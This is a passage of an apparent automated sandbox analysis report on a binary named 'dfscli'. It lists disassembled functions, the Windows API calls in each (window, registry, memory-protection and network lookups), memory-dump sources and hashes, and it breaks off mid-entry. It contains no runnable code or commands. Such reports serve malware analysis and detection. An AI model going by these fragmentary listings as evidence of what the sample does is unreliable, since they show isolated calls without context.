                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: B
                                                                  • API String ID: 0-2386870291
                                                                  • Opcode ID: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction ID: e63f41d058283e0c0eb0ae7a93c28366d44745800656fe3e600f804c74b5ca7e
                                                                  • Opcode Fuzzy Hash: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction Fuzzy Hash: E2312971904701EADB249F36AD45BDB37A4DF95314F24447BF909E2282FB7C8981839D
                                                                  Function 00421EC1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00421F77
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F89
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F9A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00421FB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID: (
                                                                  • API String ID: 2178440468-3887548279
                                                                  • Opcode ID: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction ID: 4f815d2d5e0452abf6b21b186733e73ea544739a7e03d6a9e74580ef656ef9a0
                                                                  • Opcode Fuzzy Hash: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction Fuzzy Hash: 063105353003249FCB20AF6AE984A6FB7B4BF14314F95052EF552977A1DB39E805CB98
                                                                  Function 0041FF75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041FFB6
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0041FFD5
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0041FFE0
                                                                  • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0041FFF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledItemLongMessageSend
                                                                  • String ID: Edit
                                                                  • API String ID: 3499652902-554135844
                                                                  • Opcode ID: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction ID: 3fda86f08f798bfc712dbe9114479d5ed61c9c1c5043182bfc70c8b50dcb543f
                                                                  • Opcode Fuzzy Hash: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction Fuzzy Hash: EF01C830300221AAFA302A26BC05B9BB7966F11759F94443BF402D12A2CBE9DCC6C55C
                                                                  Function 00416AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00432A70,00000010,004107C0,00000000,00000FA0,76230A60,00000000,00411F62,0040E8F2,?,00431A70,00000060), ref: 00416AD3
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00416AE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$`#vp,$v$kernel32.dll
                                                                  • API String ID: 1646373207-1530109648
                                                                  • Opcode ID: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction ID: ce44358daea0c9ea577a3d839c8de632687c57e94c437d53c63a589a871009e4
                                                                  • Opcode Fuzzy Hash: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction Fuzzy Hash: 86F05430740302EFDB28AFA5DD05B8E36A4AF45394F64D17BA412E26A0D7BCD9849A1D
                                                                  Function 004169F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00410526), ref: 004169FB
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00416A0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32$`#vp,$v
                                                                  • API String ID: 1646373207-3967587774
                                                                  • Opcode ID: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction ID: f7e75c8983afe75b452e8c5a0e3795a3a9e97458d4fb11f8d1bffce13407fbee
                                                                  • Opcode Fuzzy Hash: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction Fuzzy Hash: BCC01270350300AAE9606B622D19F56218C6F18B83F1904667503F01A0CB68C081653D
                                                                  Function 0042B2F3 Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B2F8
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0042B323
                                                                  • VariantClear.OLEAUT32(0000000C), ref: 0042B47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariantlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2416264355-0
                                                                  • Opcode ID: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction ID: 2154954aee45bc9f37d5e476858aa3f54607d5b4520b193f721ce322dcdb1a24
                                                                  • Opcode Fuzzy Hash: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction Fuzzy Hash: 9381D471A01629EBCF10DF55E881AAEBBB0FF05358F90851AF854AB251C738D991CBD8
                                                                  Function 004121F8 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0040E699,?), ref: 004122AB
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 00412329
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 0041238E
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 004123B2
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 00412412
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction ID: d666452b32fb370f5039d9c4d9c953f1fa938a618f22207ba933b66a0757dcd5
                                                                  • Opcode Fuzzy Hash: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction Fuzzy Hash: 8F511530A006158FCB288F28DB817EA73A5BB49314F64957BD851C72A1E3FCDCE2864D
                                                                  Function 00412B89 Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00412BE6
                                                                  • GetFileType.KERNEL32(?), ref: 00412C90
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00412D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID:
                                                                  • API String ID: 2461013171-0
                                                                  • Opcode ID: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction ID: d278a9e66e7a289658028d0007e01ec58958c44d3a53fc808e972aab8f93b423
                                                                  • Opcode Fuzzy Hash: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction Fuzzy Hash: 6A512A702047418FD7208F68DD847A677E4FB12328F24863ED696CB2E1E7B8D4A6C749
                                                                  Function 0040F2EB Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction ID: cd14ed6faf968c26f5ad3f682f5955487037b3cb07160dd73ebcc5381cbba43c
                                                                  • Opcode Fuzzy Hash: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction Fuzzy Hash: 3341F3B1D00225AACF30BFA69C848AFBA74EB55728710453FFD15B66D1D33C4D898A9C
                                                                  Function 00404812 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040483B
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00404847
                                                                  • LockResource.KERNEL32(00000000), ref: 0040485C
                                                                  • FreeResource.KERNEL32(00000000), ref: 0040488F
                                                                  • GetDlgItem.USER32(?,00000000), ref: 00404939
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeItemLoadLock
                                                                  • String ID:
                                                                  • API String ID: 996205394-0
                                                                  • Opcode ID: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction ID: 6aec8b371c9fab22d9bb11c82ff679e6f8f2bf4797d8e8c33563a997009e8f8d
                                                                  • Opcode Fuzzy Hash: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction Fuzzy Hash: DF514EB5A00209EFCB14DF66C484AAEBBB5FF84314F14847AE916AB391D738E941CF54
                                                                  Function 004070AF Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004070B4
                                                                  • SendMessageA.USER32(?,00000138,?,?), ref: 00407138
                                                                  • GetBkColor.GDI32(?), ref: 00407141
                                                                  • GetTextColor.GDI32(?), ref: 0040714D
                                                                  • GetThreadLocale.KERNEL32(0000F1C0), ref: 004071DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                  • String ID:
                                                                  • API String ID: 741590120-0
                                                                  • Opcode ID: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction ID: 20cee96fae53f77c6612ec2f8febb233d27f76521b7ee9c4483379ac0ab0fb9c
                                                                  • Opcode Fuzzy Hash: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction Fuzzy Hash: 7C518E30904306DFCB10EF65C8445AAB7B0FF44314B10896EF856AB3A1E778B955CB6A
                                                                  Function 00426F77 Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00426ED9: GetParent.USER32(?), ref: 00426F2C
                                                                    • Part of subcall function 00426ED9: GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                    • Part of subcall function 00426ED9: IsWindowEnabled.USER32(?), ref: 00426F50
                                                                    • Part of subcall function 00426ED9: EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  • EnableWindow.USER32(?,00000001), ref: 00426FB7
                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00426FCB
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00427041
                                                                  • MessageBoxA.USER32(?,?,?,000000F0), ref: 00427065
                                                                  • EnableWindow.USER32(?,00000001), ref: 00427081
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                  • String ID:
                                                                  • API String ID: 489645344-0
                                                                  • Opcode ID: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction ID: 94a83bf1e9e898c293309cd3d0189100989e43beb641fad24fa4ba7b3a2eaaf4
                                                                  • Opcode Fuzzy Hash: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction Fuzzy Hash: 4531E531B043689FEF309FA5ED80B9EB7B4AF05700F55002EEA05AB281DBB99D058B55
                                                                  Function 0040E573 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0040E622
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0040E648
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                  • String ID:
                                                                  • API String ID: 4136887677-0
                                                                  • Opcode ID: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction ID: 1d15696ca511e8db17db0566d3fc480254b9efd771fcc7e6bea79be161feb034
                                                                  • Opcode Fuzzy Hash: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction Fuzzy Hash: EC31C232E00229EBCF20CBA6DD44AEE7B78EB14354F540C76E901F7290D6768E51DB98
                                                                  Function 0042867C Relevance: 7.6, APIs: 5, Instructions: 70registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428681
                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004286AA
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004286CE
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00428761
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0042876F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteEnumH_prologOpen
                                                                  • String ID:
                                                                  • API String ID: 3131381098-0
                                                                  • Opcode ID: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction ID: 3b1ea214686a536e0a2d4bea5f1d2e89e807bfaa4abb09b0d42beed4e779e599
                                                                  • Opcode Fuzzy Hash: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction Fuzzy Hash: 6521BC32E00128AFDB21DB54DC44BEEB7B4FB08310F0042AAE855B72A0CB388E51DF94
                                                                  Function 004272B3 Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423C94: GetDlgItem.USER32(?,?), ref: 00423CA1
                                                                  • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 004272F4
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00427308
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042732E
                                                                  • GetWindow.USER32(?,00000002), ref: 00427338
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00427348
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemLong
                                                                  • String ID:
                                                                  • API String ID: 1613074769-0
                                                                  • Opcode ID: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction ID: fe25e8e1c6ca3775ff26ef85d9a3a830e02c818cf282e5b9224e09687ff5b461
                                                                  • Opcode Fuzzy Hash: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction Fuzzy Hash: FC116D7120422AFFDF109F51EC84EAA7B29FF443A4F508126FD154A2A0CB34AD51DBA4
                                                                  Function 0042C0CB Relevance: 7.6, APIs: 5, Instructions: 58networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLastgethostbynamehtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3864313882-0
                                                                  • Opcode ID: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction ID: 55ba63c0e82c93a398f165e94c6545409e9e25af3e370e3a1538512de266e412
                                                                  • Opcode Fuzzy Hash: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction Fuzzy Hash: 4D116D31A00228DFCB10EFA5E8859EDBBB4FF08754F40456AF405A72A1D7389A51CF99
                                                                  Function 00427DB5 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,?,?,?,?,?,00407712,?,00000000,?,7694E800), ref: 00427DC5
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427DFF
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E08
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426089
